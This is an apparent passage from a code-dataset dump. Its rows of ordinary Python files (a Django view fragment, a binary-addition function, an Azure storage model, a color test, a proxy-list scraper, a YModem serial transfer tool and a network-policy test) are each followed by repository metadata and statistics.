send_mail('Coursereg notification', request.POST['message'], settings.DEFAULT_FROM_EMAIL, [user.email, user.adviser.email])
    except Exception:
messages.warning(request, 'Error sending e-mail. But a notification has been created on this website.')
return redirect(request.POST.get('next', reverse('coursereg:index')))
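# Illustrative request payloads (field names taken from the views above; the
# URL paths are hypothetical):
#
#   POST /coursereg/notifications/dismiss  id=<user id>&next=/
#   POST /coursereg/notifications/notify   id=<user id>&message=...&next=/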
| 45.34 | 131 | 0.758271 | 296 | 2,267 | 5.689189 | 0.277027 | 0.057007 | 0.057007 | 0.045131 | 0.434086 | 0.402019 | 0.402019 | 0.347981 | 0.32601 | 0.191211 | 0 | 0 | 0.146008 | 2,267 | 49 | 132 | 46.265306 | 0.869835 | 0 | 0 | 0.212766 | 0 | 0 | 0.067049 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042553 | false | 0 | 0.234043 | 0 | 0.319149 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a83e03a5805d48d1783c453a34cd624c971c7012 | 484 | py | Python | LeetCode/add_binary.py | milkrong/Basic-Python-DS-Algs | e3accd22d8cf25546f33883aac634a9bfe108b34 | [
"MIT"
] | null | null | null | LeetCode/add_binary.py | milkrong/Basic-Python-DS-Algs | e3accd22d8cf25546f33883aac634a9bfe108b34 | [
"MIT"
] | null | null | null | LeetCode/add_binary.py | milkrong/Basic-Python-DS-Algs | e3accd22d8cf25546f33883aac634a9bfe108b34 | [
"MIT"
] | null | null | null | def add_binary(a, b):
    '''
    Add two binary numbers given as strings of '0'/'1' characters.
    :param a: str, binary number, e.g. '1010'
    :param b: str, binary number, e.g. '1011'
    :return: str, binary sum of a and b
    '''
result = ''
index = 0
carry = '0'
while index < max(len(a), len(b)) or carry == '1':
num_a = a[-1 - index] if index < len(a) else '0'
num_b = b[-1 - index] if index < len(b) else '0'
val = int(num_a) + int(num_b) + int(carry)
result = "%s%s" % (val % 2, result)
carry = '1' if val > 1 else '0'
index += 1
return result
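# Examples:
#   add_binary('11', '1')      -> '100'
#   add_binary('1010', '1011') -> '10101'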
| 20.166667 | 56 | 0.464876 | 76 | 484 | 2.894737 | 0.315789 | 0.068182 | 0.072727 | 0.118182 | 0.145455 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038961 | 0.363636 | 484 | 23 | 57 | 21.043478 | 0.675325 | 0.082645 | 0 | 0 | 0 | 0 | 0.023923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a83ef76f0db9af649a83f2eb68ffddc1dd292b97 | 15,732 | py | Python | blobxfer/models/azure.py | amishra-dev/blobxfer | ce226392f0ede609a0a82d7b9c0e3a959e1e089f | [
"MIT"
] | 147 | 2016-07-27T06:24:38.000Z | 2022-03-12T05:43:30.000Z | blobxfer/models/azure.py | amishra-dev/blobxfer | ce226392f0ede609a0a82d7b9c0e3a959e1e089f | [
"MIT"
] | 127 | 2016-09-01T08:06:51.000Z | 2022-02-18T02:52:42.000Z | blobxfer/models/azure.py | amishra-dev/blobxfer | ce226392f0ede609a0a82d7b9c0e3a959e1e089f | [
"MIT"
] | 47 | 2016-07-25T16:19:01.000Z | 2022-01-25T17:59:49.000Z | # Copyright (c) Microsoft Corporation
#
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# stdlib imports
import enum
import pathlib
# non-stdlib imports
from azure.storage.blob.models import _BlobTypes as BlobTypes
# local imports
import blobxfer.models.metadata
import blobxfer.util
# enums
class StorageModes(enum.Enum):
Auto = 10
Append = 20
Block = 30
File = 40
Page = 50
class StorageEntity(object):
"""Azure Storage Entity"""
def __init__(self, container, ed=None):
# type: (StorageEntity, str
# blobxfer.models.crypto.EncryptionMetadata) -> None
"""Ctor for StorageEntity
:param StorageEntity self: this
:param str container: container name
:param blobxfer.models.crypto.EncryptionMetadata ed:
encryption metadata
"""
self._can_create_containers = None
self._client = None
self._container = container
self._name = None
self._mode = None
self._lmt = None
self._size = None
self._snapshot = None
self._md5 = None
self._cache_control = None
self._encryption = ed
self._from_local = False
self._append_create = True
self._vio = None
self._fileattr = None
self._raw_metadata = None
self._access_tier = None
self._content_type = None
self._is_arbitrary_url = False
self.replica_targets = None
@property
def can_create_containers(self):
# type: (StorageEntity) -> bool
"""Create containers
:param StorageEntity self: this
:rtype: bool
:return: create containers
"""
return self._can_create_containers
@property
def client(self):
# type: (StorageEntity) -> object
"""Associated storage client
:param StorageEntity self: this
:rtype: object
:return: associated storage client
"""
return self._client
@property
def container(self):
# type: (StorageEntity) -> str
"""Container name
:param StorageEntity self: this
:rtype: str
:return: name of container or file share
"""
return self._container
@property
def name(self):
# type: (StorageEntity) -> str
"""Entity name
:param StorageEntity self: this
:rtype: str
:return: name of entity
"""
return self._name
@property
def path(self):
# type: (StorageEntity) -> str
"""Entity path
:param StorageEntity self: this
:rtype: str
:return: remote path of entity
"""
if self._is_arbitrary_url:
return self._name
else:
return '{}/{}'.format(self._container, self._name)
@property
def lmt(self):
# type: (StorageEntity) -> datetime.datetime
"""Entity last modified time
:param StorageEntity self: this
:rtype: datetime.datetime
:return: LMT of entity
"""
return self._lmt
@property
def size(self):
# type: (StorageEntity) -> int
"""Entity size
:param StorageEntity self: this
:rtype: int
:return: size of entity
"""
return self._size
@size.setter
def size(self, value):
# type: (StorageEntity, int) -> None
"""Set entity size
:param StorageEntity self: this
:param int value: value
"""
self._size = value
@property
def snapshot(self):
# type: (StorageEntity) -> str
"""Entity snapshot
:param StorageEntity self: this
:rtype: str
:return: snapshot of entity
"""
return self._snapshot
@property
def cache_control(self):
# type: (StorageEntity) -> str
"""Cache control
:param StorageEntity self: this
:rtype: str
:return: cache control of entity
"""
return self._cache_control
@cache_control.setter
def cache_control(self, value):
# type: (StorageEntity, str) -> None
"""Set cache control
:param StorageEntity self: this
:param str value: value
"""
self._cache_control = value
@property
def md5(self):
# type: (StorageEntity) -> str
"""Base64-encoded MD5
:param StorageEntity self: this
:rtype: str
:return: md5 of entity
"""
return self._md5
@property
def mode(self):
# type: (StorageEntity) -> blobxfer.models.azure.StorageModes
"""Entity mode (type)
:param StorageEntity self: this
:rtype: blobxfer.models.azure.StorageModes
:return: type of entity
"""
return self._mode
@property
def from_local(self):
# type: (StorageEntity) -> bool
"""If entity was created from a local file (no remote exists)
:param StorageEntity self: this
:rtype: bool
:return: if entity is from local (no remote exists)
"""
return self._from_local
@property
def append_create(self):
# type: (StorageEntity) -> bool
"""If append blob should be created
:param StorageEntity self: this
:rtype: bool
:return: if append blob should be created
"""
return self._append_create
@append_create.setter
def append_create(self, value):
# type: (StorageEntity, bool) -> None
"""Set append create option
:param StorageEntity self: this
:param bool value: value to set
"""
self._append_create = value
@property
def is_encrypted(self):
# type: (StorageEntity) -> bool
"""If data is encrypted
:param StorageEntity self: this
:rtype: bool
:return: if encryption metadata is present
"""
return self._encryption is not None
@property
def encryption_metadata(self):
# type: (StorageEntity) ->
# blobxfer.models.crypto.EncryptionMetadata
"""Get encryption metadata
:param StorageEntity self: this
:rtype: blobxfer.models.crypto.EncryptionMetadata
:return: encryption metadata of entity
"""
return self._encryption
@encryption_metadata.setter
def encryption_metadata(self, value):
# type: (StorageEntity,
# blobxfer.models.crypto.EncryptionMetadata) -> None
"""Set encryption metadata
:param StorageEntity self: this
:param blobxfer.models.crypto.EncryptionMetadata value: value
"""
self._encryption = value
@property
def file_attributes(self):
# type: (StorageEntity) -> object
"""Return file attributes collection
:param StorageEntity self: this
:rtype: blobxfer.models.metadata.PosixFileAttr or
blobxfer.models.metadata.WindowsFileAttr or None
:return: file attributes
"""
return self._fileattr
@property
def vectored_io(self):
# type: (StorageEntity) -> object
"""Return vectored io metadata, currently stripe only
:param StorageEntity self: this
:rtype: blobxfer.models.metadata.VectoredStripe or None
:return: vectored io metadata
"""
return self._vio
@property
def raw_metadata(self):
# type: (StorageEntity) -> dict
"""Return raw metadata for synccopy sources
:param StorageEntity self: this
:rtype: dict
:return: raw metadata
"""
return self._raw_metadata
@property
def access_tier(self):
# type: (StorageEntity) -> str
"""Return access tier for blob
:param StorageEntity self: this
:rtype: str
:return: access tier
"""
return self._access_tier
@access_tier.setter
def access_tier(self, value):
# type: (StorageEntity, str) -> None
"""Set access tier
:param StorageEntity self: this
:param str value: value
"""
self._access_tier = value
@property
def content_type(self):
# type: (StorageEntity) -> str
"""Return content type
:param StorageEntity self: this
:rtype: str
:return: content type
"""
return self._content_type
@content_type.setter
def content_type(self, value):
# type: (StorageEntity, str) -> None
"""Set content type
:param StorageEntity self: this
:param str value: value
"""
self._content_type = value
@property
def is_arbitrary_url(self):
# type: (StorageEntity) -> bool
"""Is an arbitrary URL
:param StorageEntity self: this
:rtype: bool
:return: arbitrary URL
"""
return self._is_arbitrary_url
def populate_from_blob(self, sa, blob, vio=None, store_raw_metadata=False):
# type: (StorageEntity, blobxfer.operations.azure.StorageAccount,
# azure.storage.blob.models.Blob) -> None
"""Populate properties from Blob
:param StorageEntity self: this
:param blobxfer.operations.azure.StorageAccount sa: storage account
:param azure.storage.blob.models.Blob blob: blob to populate from
:param blobxfer.models.metadata.VectoredStripe vio: Vectored stripe
:param bool store_raw_metadata: store raw metadata
"""
if store_raw_metadata:
self._raw_metadata = blob.metadata
else:
self._fileattr = blobxfer.models.metadata.fileattr_from_metadata(
blob.metadata)
self._vio = vio
self._can_create_containers = sa.can_create_containers
self._name = blob.name
self._snapshot = blob.snapshot
self._lmt = blob.properties.last_modified
self._size = blob.properties.content_length
self._md5 = blob.properties.content_settings.content_md5
self._cache_control = blob.properties.content_settings.cache_control
self._content_type = blob.properties.content_settings.content_type
if blob.properties.blob_type == BlobTypes.AppendBlob:
self._mode = StorageModes.Append
self._client = sa.append_blob_client
elif blob.properties.blob_type == BlobTypes.BlockBlob:
self._access_tier = blob.properties.blob_tier
self._mode = StorageModes.Block
self._client = sa.block_blob_client
elif blob.properties.blob_type == BlobTypes.PageBlob:
self._mode = StorageModes.Page
self._client = sa.page_blob_client
def populate_from_file(
self, sa, file, path, vio=None, store_raw_metadata=False,
snapshot=None):
# type: (StorageEntity, blobxfer.operations.azure.StorageAccount,
# azure.storage.file.models.File, str,
# blobxfer.models.metadata.VectoredStripe, bool, str) -> None
"""Populate properties from File
:param StorageEntity self: this
:param blobxfer.operations.azure.StorageAccount sa: storage account
:param azure.storage.file.models.File file: file to populate from
:param str path: full path to file
:param blobxfer.models.metadata.VectoredStripe vio: Vectored stripe
:param bool store_raw_metadata: store raw metadata
:param str snapshot: snapshot
"""
if store_raw_metadata:
self._raw_metadata = file.metadata
else:
self._fileattr = blobxfer.models.metadata.fileattr_from_metadata(
file.metadata)
self._vio = vio
self._can_create_containers = sa.can_create_containers
if path is not None:
self._name = str(pathlib.Path(path) / file.name)
else:
self._name = file.name
self._snapshot = snapshot
self._lmt = file.properties.last_modified
self._size = file.properties.content_length
self._md5 = file.properties.content_settings.content_md5
self._cache_control = file.properties.content_settings.cache_control
self._content_type = file.properties.content_settings.content_type
self._mode = StorageModes.File
self._client = sa.file_client
def populate_from_local(
self, sa, container, path, mode, cache_control, content_type):
# type: (StorageEntity, blobxfer.operations.azure.StorageAccount
# str, str, blobxfer.models.azure.StorageModes, str,
# str) -> None
"""Populate properties from local
:param StorageEntity self: this
:param blobxfer.operations.azure.StorageAccount sa: storage account
:param str container: container
:param str path: full path to file
:param blobxfer.models.azure.StorageModes mode: storage mode
:param str cache_control: cache control
:param str content_type: content type
"""
self._can_create_containers = sa.can_create_containers
self._container = container
self._name = path
self._mode = mode
self._cache_control = cache_control
self._content_type = content_type or blobxfer.util.get_mime_type(path)
self._from_local = True
if mode == StorageModes.Append:
self._client = sa.append_blob_client
elif mode == StorageModes.Block:
self._client = sa.block_blob_client
elif mode == StorageModes.File:
self._client = sa.file_client
elif mode == StorageModes.Page:
self._client = sa.page_blob_client
elif mode == StorageModes.Auto:
name = self.name.lower()
if name.endswith('.vhd') or name.endswith('.vhdx'):
self._client = sa.page_blob_client
self._mode = StorageModes.Page
else:
self._client = sa.block_blob_client
self._mode = StorageModes.Block
def populate_from_arbitrary_url(self, remote_path, size):
# type: (StorageEntity, str, int) -> None
"""Populate properties from an arbitrary url
:param StorageEntity self: this
:param str remote_path: remote path
:param int size: content length
"""
# fake a client
self._client = lambda: None
setattr(self._client, 'primary_endpoint', remote_path.split('/')[2])
# set attributes
self._is_arbitrary_url = True
self._container = None
self._name = remote_path
self._size = size
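# Illustrative construction (a sketch; `sa` is assumed to be a configured
# blobxfer.operations.azure.StorageAccount and `blob` a blob returned from a
# listing call):
#
#   ase = StorageEntity('mycontainer')
#   ase.populate_from_blob(sa, blob)
#   print(ase.path, ase.size, ase.mode)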
| 33.54371 | 79 | 0.622616 | 1,718 | 15,732 | 5.551222 | 0.135623 | 0.057041 | 0.073818 | 0.087239 | 0.473 | 0.35011 | 0.290972 | 0.223865 | 0.148474 | 0.118276 | 0 | 0.001982 | 0.294495 | 15,732 | 468 | 80 | 33.615385 | 0.857284 | 0.43599 | 0 | 0.270408 | 0 | 0 | 0.004114 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.163265 | false | 0 | 0.02551 | 0 | 0.336735 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a83fb50879060487859106ba5c544390d8e9a35d | 405 | py | Python | tests/color_manager_test.py | YouTwitFace/babi | 3697e931aefbe09178fc0441d403c5040ecfc4cd | [
"MIT"
] | 1 | 2020-06-29T11:37:47.000Z | 2020-06-29T11:37:47.000Z | tests/color_manager_test.py | apalyukha/babi | 3f259403fe2c8459321e3d89e123b2f5b379408f | [
"MIT"
] | null | null | null | tests/color_manager_test.py | apalyukha/babi | 3f259403fe2c8459321e3d89e123b2f5b379408f | [
"MIT"
] | null | null | null | import pytest
from babi.color import Color
from babi.color_manager import _color_to_curses
@pytest.mark.parametrize(
('color', 'expected'),
(
(Color(0x00, 0x00, 0x00), (0, 0, 0)),
(Color(0xff, 0xff, 0xff), (1000, 1000, 1000)),
(Color(0x1e, 0x77, 0xd3), (117, 466, 827)),
),
)
def test_color_to_curses(color, expected):
assert _color_to_curses(color) == expected
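# The expected triples follow curses' 0-1000 color scale; a per-component
# conversion consistent with every case above (an assumption about how
# _color_to_curses works) is:
#
#   def to_curses_component(c: int) -> int:
#       return c * 1000 // 255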
| 23.823529 | 54 | 0.639506 | 54 | 405 | 4.611111 | 0.444444 | 0.084337 | 0.156627 | 0.144578 | 0.208835 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133956 | 0.207407 | 405 | 16 | 55 | 25.3125 | 0.641745 | 0 | 0 | 0 | 0 | 0 | 0.032099 | 0 | 0 | 0 | 0.088889 | 0 | 0.076923 | 1 | 0.076923 | false | 0 | 0.230769 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a843101c221a512fefd60a227e47a0ad07e6f925 | 2,333 | py | Python | ipproxytool/spiders/proxy/gatherproxy.py | yzf233/IPProxyTool | 2775b1d73ef66899434eb134ab3bcd01b46e5d10 | [
"MIT"
] | 5 | 2017-07-21T09:44:33.000Z | 2021-08-08T16:27:45.000Z | ipproxytool/spiders/proxy/gatherproxy.py | haoyu311/IPProxyTool | eaf4c760879f93e3c56fb78f238a55a45ff78e82 | [
"MIT"
] | 3 | 2021-03-31T18:28:23.000Z | 2022-03-02T14:54:29.000Z | ipproxytool/spiders/proxy/gatherproxy.py | meihuanyu/rental | eb29b280c294defefefd56de5a8e32040c481f62 | [
"MIT"
] | 2 | 2018-06-28T14:47:08.000Z | 2018-06-29T09:50:07.000Z | # coding=utf-8
import json
import random
import re
import requests
from proxy import Proxy
from .basespider import BaseSpider
class GatherproxySpider(BaseSpider):
name = 'gatherproxy'
def __init__(self, *a, **kwargs):
super(GatherproxySpider, self).__init__(*a, **kwargs)
self.urls = [
'http://gatherproxy.com/',
'http://www.gatherproxy.com/proxylist/anonymity/?t=Anonymous',
'http://gatherproxy.com/proxylist/country/?c=China',
]
self.headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
'Host': 'www.gatherproxy.com',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0) Gecko/20100101 Firefox/52.0'
}
# self.proxies = self.get_proxy()
self.init()
def parse_page(self, response):
pattern = re.compile('gp.insertPrx\((.*?)\)', re.S)
items = re.findall(pattern, response.body)
for item in items:
data = json.loads(item)
            # the scraped port value is a hexadecimal string
port = data.get('PROXY_PORT')
port = str(int(port, 16))
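            # e.g. a scraped PROXY_PORT of '1F90' decodes to port '8080'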
proxy = Proxy()
proxy.set_value(
ip = data.get('PROXY_IP'),
port = port,
country = data.get('PROXY_COUNTRY'),
anonymity = data.get('PROXY_TYPE'),
source = self.name,
)
self.add_proxy(proxy = proxy)
def get_proxy(self):
try:
url = 'http://127.0.0.1:8000/?name={0}'.format(self.name)
r = requests.get(url = url)
if r.text != None and r.text != '':
data = json.loads(r.text)
if len(data) > 0:
proxy = random.choice(data)
ip = proxy.get('ip')
port = proxy.get('port')
address = '%s:%s' % (ip, port)
proxies = {
'http': 'http://%s' % address
}
return proxies
except:
return None
| 31.527027 | 110 | 0.491642 | 253 | 2,333 | 4.466403 | 0.450593 | 0.042478 | 0.042478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028455 | 0.367338 | 2,333 | 73 | 111 | 31.958904 | 0.737127 | 0.022718 | 0 | 0 | 0 | 0.034483 | 0.239895 | 0.047891 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051724 | false | 0 | 0.103448 | 0 | 0.224138 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a844b552f292190f3c5fa040f3621afb025f7afe | 7,164 | py | Python | solutions/block_demo/.utility/python/transymodem.py | wstong999/AliOS-Things | 6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9 | [
"Apache-2.0"
] | null | null | null | solutions/block_demo/.utility/python/transymodem.py | wstong999/AliOS-Things | 6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9 | [
"Apache-2.0"
] | null | null | null | solutions/block_demo/.utility/python/transymodem.py | wstong999/AliOS-Things | 6554769cb5b797e28a30a4aa89b3f4cb2ef2f5d9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# version 1.0.1
import os
import sys
import re
import codecs
import time
import json
import argparse
import inspect
from ymodemfile import YModemfile
try:
import serial
from serial.tools import miniterm
from serial.tools.list_ports import comports
except:
    print("\n\npyserial not found, please install it:\nsudo pip install pyserial")
sys.exit(0)
def read_json(json_file):
data = None
if os.path.isfile(json_file):
with open(json_file, 'r') as f:
data = json.load(f)
return data
def write_json(json_file, data):
with open(json_file, 'w') as f:
f.write(json.dumps(data, indent=4, separators=(',', ': ')))
def ymodemTrans(serialport, filename):
def sender_getc(size):
return serialport.read(size) or None
def sender_putc(data, timeout=15):
return serialport.write(data)
sender = YModemfile(sender_getc, sender_putc)
sent = sender.send_file(filename)
def send_check_recv_data(serialport, pattern, timeout):
""" receive serial data, and check it with pattern """
matcher = re.compile(pattern)
tic = time.time()
buff = serialport.read(128)
while (time.time() - tic) < timeout:
buff += serialport.read(128)
if matcher.search(buff):
return True
return False
def download_file(portnum, baudrate, filepath):
# open serial port first
serialport = serial.Serial()
serialport.port = portnum
serialport.baudrate = baudrate
serialport.parity = "N"
serialport.bytesize = 8
serialport.stopbits = 1
serialport.timeout = 0.05
try:
serialport.open()
except Exception as e:
raise Exception("Failed to open serial port: %s!" % portnum)
    # send handshake word to check amp boot mode
mylist = [0xA5]
checkstatuslist = [0x5A]
bmatched = False
shakehand = False
count = 0
reboot_count = 0
# step 1: check system status
for i in range(300):
serialport.write(serial.to_bytes(checkstatuslist))
time.sleep(0.1)
buff = serialport.read(2)
print(buff)
        # case 1: echo received, the board is in cli or repl mode
if((buff) == b'Z'):
# print('Read data OK');
reboot_count += 1
else:
            # no echo: the board is in normal running mode
print("Please reboot the board manually.")
break
if(reboot_count >= 4):
# need reboot system
print("Please reboot the board manually.")
break
# step 2: wait reboot and hand shakend cmd
time.sleep(1)
bmatched = send_check_recv_data(serialport, b'amp shakehand begin...', 10)
# print(buff)
if bmatched:
print('amp shakehand begin...')
for i in range(300):
serialport.write(serial.to_bytes(mylist))
time.sleep(0.1)
buff = serialport.read(2)
print(buff)
if((buff) == b'Z'):
# print('Read data OK');
count += 1
if(count >= 4):
shakehand = True
if shakehand:
break
if i > 5:
print("Please reboot the board manually.")
break
else:
print("Please reboot the board manually, and try it again.")
serialport.close()
return
# start send amp boot cmd
time.sleep(0.1)
print("start to send amp_boot cmd")
cmd = 'amp_boot'
serialport.write(cmd.encode())
# serialport.write(b'amp_boot')
# send file transfer cmd
time.sleep(0.1)
# print("start to send file cmd")
# cmd = 'cmd_file_transfer\n'
# serialport.write(cmd.encode())
bmatched = send_check_recv_data(serialport, b'amp shakehand success', 2)
# serialport.write(b'cmd_flash_js\n')
# send file
if bmatched:
print("start to send file cmd")
cmd = 'cmd_file_transfer\n'
serialport.write(cmd.encode())
print('amp shakehand success')
time.sleep(0.1)
ymodemTrans(serialport, filepath)
print("Ymodem transfer file finish")
# send file transfer cmd
time.sleep(0.1)
print("send cmd exit")
cmd = 'cmd_exit\n'
serialport.write(cmd.encode())
else:
        print('amp shakehand failed, please reboot the board manually')
# close serialport
serialport.close()
def get_downloadconfig():
    """ Generate a default (empty) download configuration for chip_haas1000;
    the values are filled in later from the command-line arguments. """
configs = {}
configs['chip_haas1000'] = {}
configs['chip_haas1000']['serialport'] = ''
configs['chip_haas1000']['baudrate'] = ''
configs['chip_haas1000']['filepath'] = ''
return configs['chip_haas1000']
def main2():
cmd_parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='''Run and transfer file to system.''',)
cmd_parser.add_argument('-d', '--device', default='',
help='the serial device or the IP address of the pyboard')
cmd_parser.add_argument(
'-b', '--baudrate', default=115200, help='the baud rate of the serial device')
cmd_parser.add_argument('files', nargs='*', help='input transfer files')
args = cmd_parser.parse_args()
print(args)
# download file
# step 1: set config
downloadconfig = get_downloadconfig()
# step 2: get serial port
if not downloadconfig["serialport"]:
downloadconfig["serialport"] = args.device
if not downloadconfig["serialport"]:
downloadconfig["serialport"] = miniterm.ask_for_port()
if not downloadconfig["serialport"]:
print("no specified serial port")
return
else:
needsave = True
# step 3: get baudrate
if not downloadconfig["baudrate"]:
downloadconfig["baudrate"] = args.baudrate
if not downloadconfig["baudrate"]:
downloadconfig["baudrate"] = "115200"
# step 4: get transfer file
if not downloadconfig["filepath"]:
downloadconfig["filepath"] = args.files
if not downloadconfig["filepath"]:
print('no file wait to transfer')
return
if os.path.isabs("".join(downloadconfig["filepath"])):
filepath = "".join(downloadconfig["filepath"])
print('the filepath is abs path')
else:
basepath = os.path.abspath('.')
filepath = basepath + '/' + "".join(downloadconfig["filepath"])
print('the filepath is not abs path')
print("serial port is %s" % downloadconfig["serialport"])
print("transfer baudrate is %s" % downloadconfig["baudrate"])
# print(base_path(downloadconfig["filepath"]))
print("filepath is %s" % filepath)
# print("the settings were restored in the file %s" % os.path.join(os.getcwd(), '.config_burn'))
# step 5: download file
download_file(downloadconfig["serialport"],
downloadconfig['baudrate'], filepath)
if __name__ == "__main__":
main2()
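# Example invocation (the script name, device path and file name are all
# illustrative):
#   python <this script>.py -d /dev/ttyUSB0 -b 115200 app.js
# Without -d, miniterm.ask_for_port() prompts for a serial port interactively.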
| 28.887097 | 100 | 0.61139 | 848 | 7,164 | 5.082547 | 0.253538 | 0.031323 | 0.030858 | 0.015313 | 0.24942 | 0.22877 | 0.19652 | 0.123202 | 0.112529 | 0.068213 | 0 | 0.019238 | 0.274428 | 7,164 | 247 | 101 | 29.004049 | 0.809927 | 0.144472 | 0 | 0.271084 | 0 | 0 | 0.183119 | 0 | 0 | 0 | 0.001316 | 0 | 0 | 1 | 0.054217 | false | 0 | 0.072289 | 0.012048 | 0.180723 | 0.13253 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a847a591509f4396879b2e583da9a1dc7831b69f | 19,282 | py | Python | gbpservice/tests/contrib/gbpfunctests/testcases/tc_gbp_l3p_func.py | baodongli/group-based-policy | f3b892ecdc1051b204376e18679f73bf457ce7dc | [
"Apache-2.0"
] | null | null | null | gbpservice/tests/contrib/gbpfunctests/testcases/tc_gbp_l3p_func.py | baodongli/group-based-policy | f3b892ecdc1051b204376e18679f73bf457ce7dc | [
"Apache-2.0"
] | null | null | null | gbpservice/tests/contrib/gbpfunctests/testcases/tc_gbp_l3p_func.py | baodongli/group-based-policy | f3b892ecdc1051b204376e18679f73bf457ce7dc | [
"Apache-2.0"
] | 1 | 2019-12-03T15:28:24.000Z | 2019-12-03T15:28:24.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import commands  # Python 2 only: removed in Python 3 (subprocess.getoutput is the closest replacement)
import logging
import platform
import sys
from libs import config_libs
from libs import utils_libs
from libs import verify_libs
def main():
# Run the Testcases:
test = test_gbp_l3p_func()
if test.test_gbp_l3p_func_1() == 0:
test.cleanup(tc_name='TESTCASE_GBP_L3P_FUNC_1')
if test.test_gbp_l3p_func_2() == 0:
test.cleanup(tc_name='TESTCASE_GBP_L3P_FUNC_2')
if test.test_gbp_l3p_func_3() == 0:
test.cleanup(tc_name='TESTCASE_GBP_L3P_FUNC_3')
if test.test_gbp_l3p_func_4() == 0:
test.cleanup(tc_name='TESTCASE_GBP_L3P_FUNC_4')
test.cleanup()
utils_libs.report_results('test_gbp_l3p_func', 'test_results.txt')
sys.exit(1)
class test_gbp_l3p_func(object):
# Initialize logging
logging.basicConfig(
format='%(asctime)s [%(levelname)s] %(name)s - %(message)s',
level=logging.WARNING)
_log = logging.getLogger(__name__)
cmd = 'rm /tmp/test_gbp_l3p_func.log'
commands.getoutput(cmd)
hdlr = logging.FileHandler('/tmp/test_gbp_l3p_func.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
_log.addHandler(hdlr)
_log.setLevel(logging.INFO)
_log.setLevel(logging.DEBUG)
def __init__(self):
"""
Init def
"""
self._log.info("\n## START OF GBP L3_POLICY FUNCTIONALITY TESTSUITE\n")
self.gbpcfg = config_libs.Gbp_Config()
self.gbpverify = verify_libs.Gbp_Verify()
self.l3p_name = 'demo_l3p'
self.l2p_name = 'demo_l2p'
def cleanup(self, tc_name=''):
if tc_name != '':
self._log.info('## %s: FAILED' % (tc_name))
for obj in ['group', 'l2p', 'l3p']:
